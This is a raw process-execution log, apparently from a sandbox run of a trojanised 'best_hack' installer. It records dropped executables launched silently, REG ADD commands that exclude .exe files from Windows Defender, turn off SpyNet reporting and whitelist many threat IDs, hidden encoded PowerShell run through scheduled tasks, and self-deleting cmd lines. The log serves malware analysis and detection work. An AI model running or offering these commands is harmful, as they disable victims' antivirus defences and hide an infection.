C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1064

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1096

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1320

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1316

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1480

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1320

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 948

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1176

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1976

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1924

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Documents\best_hack.zip_id23904541.exe

"C:\Users\Admin\Documents\best_hack.zip_id23904541.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1788

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2228

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2252

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2240

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2256

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2288

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2252

C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe

C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe /VERYSILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 848 -p 1800 -ip 1800

C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe

C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260

C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp

"C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp" /SL5="$10302,2567431,54272,C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe"

C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe

C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2332

C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe

"C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe"

C:\Users\Admin\AppData\Local\Temp\SoundBose.exe

C:\Users\Admin\AppData\Local\Temp\SoundBose.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2112

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800

C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe

C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe /S /site_id=757674

C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe

C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b

C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp" /SL5="$30336,990754,54272,C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Scan Rename"

C:\Program Files (x86)\ScanRename\ScanRename.exe

"C:\Program Files (x86)\ScanRename\ScanRename.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1332

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2084

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "ScanRename.exe" /f & erase "C:\Program Files (x86)\ScanRename\ScanRename.exe" & exit

C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe

C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe /sid=3 /pid=449

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gwUPXilBw" /SC once /ST 13:30:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2076

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "ScanRename.exe" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gwUPXilBw"

C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe

C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2400

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 828 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2396

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2480

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 856 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2412

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2488

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 828 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2288

C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe

C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2520

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe & exit

C:\Windows\system32\PING.EXE

ping 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2316

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 1800 -ip 1800

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2408

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2460

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2444

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gwUPXilBw"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 1800 -ip 1800

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bGAvhKhnIPTNQeobsw" /SC once /ST 18:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe\" bt /site_id 757674 /S" /V1 /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 948

C:\Windows\SysWOW64\fontview.exe

"C:\Windows\SYSWOW64\fontview.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1796

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 948

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2216

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 868 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 844 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 3996 -ip 3996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 3996 -ip 3996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 456

C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe

C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe bt /site_id 757674 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

